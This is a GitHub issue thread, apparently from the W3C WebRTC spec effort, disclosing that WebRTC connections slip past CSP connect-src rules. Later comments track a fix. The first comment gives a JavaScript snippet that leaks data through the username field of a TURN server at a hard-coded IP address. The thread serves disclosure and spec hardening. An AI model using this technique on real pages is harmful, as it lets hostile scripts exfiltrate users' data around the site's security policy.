WebRTC bypass CSP connect-src policies

[murillo128]

As explained in here: w3c/webappsec-csp#92 WebRTC bypass the CSP security policies for connect-src and a malicious script could use webrtc to leak data to a rogue server.

Note that it is not even needed to use datachannels at all, as you could leak data (at low rate) to a specially crafted TURN server on the username:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);

IMHO this should be covered at the CSP spec, but we should add a warning at the security and privacy section of the webrtc spec until this is solved.

[alvestrand]

Pull request on CSP spec: w3c/webappsec-csp#287

[henbos]

What's the status here?

[alvestrand]

Since this is a new feature, and we've stopped adding new features, I'm moving this to the NV repo.

[aboba]

With merger of PR 38, closing this issue.